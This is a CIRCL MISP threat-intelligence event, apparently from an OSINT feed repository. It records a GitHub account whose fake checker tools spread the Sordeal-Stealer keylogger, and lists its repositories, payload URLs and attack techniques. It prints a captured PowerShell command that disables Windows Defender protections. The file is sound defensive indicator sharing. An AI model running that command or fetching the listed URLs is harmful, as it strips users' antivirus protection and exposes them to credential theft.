misp-circl-feed/feeds/circl/misp/659a6331-0690-4b3b-ae16-e29a1fc31fc2.json

387 lines
61 KiB
JSON
Raw Permalink Normal View History

2023-04-21 13:25:09 +00:00
{
2023-12-14 14:30:15 +00:00
"Event": {
"analysis": "2",
"date": "2023-04-11",
"extends_uuid": "",
"info": "Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer",
"publish_timestamp": "1681225627",
"published": true,
"threat_level_id": "2",
"timestamp": "1681225599",
"uuid": "659a6331-0690-4b3b-ae16-e29a1fc31fc2",
"Orgc": {
"name": "CIRCL",
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
},
"Tag": [
{
"colour": "#004646",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "type:OSINT",
"relationship_type": ""
},
{
"colour": "#0071c3",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "osint:lifetime=\"perpetual\"",
"relationship_type": ""
},
{
"colour": "#0087e8",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "osint:certainty=\"50\"",
"relationship_type": ""
},
{
"colour": "#ffffff",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "tlp:white",
"relationship_type": ""
},
{
"colour": "#ffffff",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "tlp:clear",
"relationship_type": ""
},
{
"colour": "#0088cc",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:stealer=\"Sordeal-Stealer\"",
"relationship_type": ""
},
{
"colour": "#0088cc",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Alternative Protocol - T1048\"",
"relationship_type": ""
},
{
"colour": "#0088cc",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:mitre-attack-pattern=\"Browser Session Hijacking - T1185\"",
"relationship_type": ""
},
{
"colour": "#075900",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:mitre-attack-pattern=\"Keylogging - T1056.001\"",
"relationship_type": ""
},
{
"colour": "#0088cc",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:mitre-attack-pattern=\"GUI Input Capture - T1056.002\"",
"relationship_type": ""
}
],
"Object": [
{
"comment": "Malicious account",
"deleted": false,
"description": "GitHub user",
"meta-category": "misc",
"name": "github-user",
"template_uuid": "4329b5e6-8e6a-4b55-8fd1-9033782017d4",
"template_version": "3",
"timestamp": "1681197484",
"uuid": "8c3b7eda-d3b0-4687-8150-230759232cb2",
"Attribute": [
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "username",
"timestamp": "1681197304",
"to_ids": false,
"type": "github-username",
"uuid": "a44cad97-d03e-48f3-8b7f-a1e71f384e06",
"value": "okkz"
},
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "repository",
"timestamp": "1681197304",
"to_ids": false,
"type": "github-repository",
"uuid": "f8feb7b6-3a90-47c8-89a4-1deaef564839",
"value": "Tiktok-Username-Checker"
},
{
"category": "External analysis",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "profile-image",
"timestamp": "1681197305",
"to_ids": false,
"type": "attachment",
"uuid": "3e89b7e6-26d9-49de-98b1-3ae980fc64f6",
"value": "120434897.jpeg"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "bio",
"timestamp": "1681197305",
"to_ids": false,
"type": "text",
"uuid": "6e7d4203-2918-45c3-9397-ca3b49634700",
"value": "Self-taught python & web developer."
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "link",
"timestamp": "1681197305",
"to_ids": false,
"type": "link",
"uuid": "0d38d67f-a087-4ae8-9069-263573cc2263",
"value": "https://github.com/okkz"
},
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "repository",
"timestamp": "1681197375",
"to_ids": false,
"type": "github-repository",
"uuid": "1a0a4867-9d67-4574-8705-129e7c31f2e2",
"value": "Steam-ID-Checker"
},
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "repository",
"timestamp": "1681197408",
"to_ids": false,
"type": "github-repository",
"uuid": "5024e29c-3a86-411d-a701-4d592ef8723c",
"value": "Tiktok-Username-Checker"
},
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "repository",
"timestamp": "1681197431",
"to_ids": false,
"type": "github-repository",
"uuid": "4bf6f9ab-9075-4dcb-aa63-16eeaa09d7cd",
"value": "lure-s-tiktok-username-checker-LEAKED"
},
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "repository",
"timestamp": "1681197456",
"to_ids": false,
"type": "github-repository",
"uuid": "561aca94-5e64-4d6d-9a3b-f4cc069e8390",
"value": "Steam-ID-Checker"
},
{
"category": "Social network",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "repository",
"timestamp": "1681197484",
"to_ids": false,
"type": "github-repository",
"uuid": "3ba60ac3-5ad9-4225-950a-df5c4f002e38",
"value": "Discord-Token-Checker"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
"meta-category": "misc",
"name": "script",
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
"template_version": "7",
"timestamp": "1681198987",
"uuid": "508397b3-2a52-4012-9969-f63c7d4f3872",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "script",
"timestamp": "1681198987",
"to_ids": false,
"type": "text",
"uuid": "18a4a4e3-f8df-4905-8f78-9086fdb5be01",
"value": "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "language",
"timestamp": "1681198987",
"to_ids": false,
"type": "text",
"uuid": "570050a4-bba2-4b4d-8884-5e7dcaad668b",
"value": "PowerShell"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "comment",
"timestamp": "1681198987",
"to_ids": false,
"type": "text",
"uuid": "b671719d-5b41-4b14-821a-6d35279f1f90",
"value": "Fetched from https://rentry.co/shitbymyself/raw"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1681198987",
"to_ids": false,
"type": "text",
"uuid": "dbe16379-285a-4592-93f1-d70d657d9a3c",
"value": "Malicious"
}
]
},
{
"comment": "",
"deleted": false,
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "9",
"timestamp": "1681200514",
"uuid": "abf89a2e-30f6-460f-80de-1556fb9aceb7",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1681200514",
"to_ids": true,
"type": "url",
"uuid": "0219ad8f-579c-4bbf-97c9-582b81c67507",
"value": "https://rentry.co/shitonyourAV/raw"
}
]
},
{
"comment": "",
"deleted": false,
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "9",
"timestamp": "1681200522",
"uuid": "6040acc9-ef3c-40ac-b38b-47ebfacd06e4",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1681200522",
"to_ids": true,
"type": "url",
"uuid": "749d9d77-faaf-4834-9342-4a50e98b945b",
"value": "https://rentry.co/shitbymyself/raw"
}
]
},
{
"comment": "",
"deleted": false,
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "9",
"timestamp": "1681200530",
"uuid": "ea61ae8e-8a2c-435e-811d-e1967ee7d111",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1681200530",
"to_ids": true,
"type": "url",
"uuid": "ae69ac2a-e85b-49b3-ac7c-65069043d600",
"value": "https://rentry.co/9ops5/raw"
}
]
},
{
"comment": "",
"deleted": false,
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "9",
"timestamp": "1681200539",
"uuid": "8265c383-09dc-447c-b9b8-ba17d1b765ff",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1681200539",
"to_ids": true,
"type": "url",
"uuid": "6772760d-c9ac-4300-8ab5-2d4aaa230a85",
"value": "https://rentry.co/khsph/raw"
}
]
}
],
"EventReport": [
{
"name": "Notes",
"content": "The GitHub account [okkz](@[suggestion](https://github.com/okkz)) hosting a series of repository with malicious Python code. The code is obfuscated and install/execute a keylogger called [Sordeal-Stealer](https://github.com/SOrdeal/).",
"id": "150",
"event_id": "155915",
"timestamp": "1681225599",
"uuid": "bbeedf0d-072f-4551-b886-b9c57f50137f",
"deleted": false
}
2023-04-21 13:25:09 +00:00
]
2023-12-14 14:30:15 +00:00
}
2023-04-21 13:25:09 +00:00
}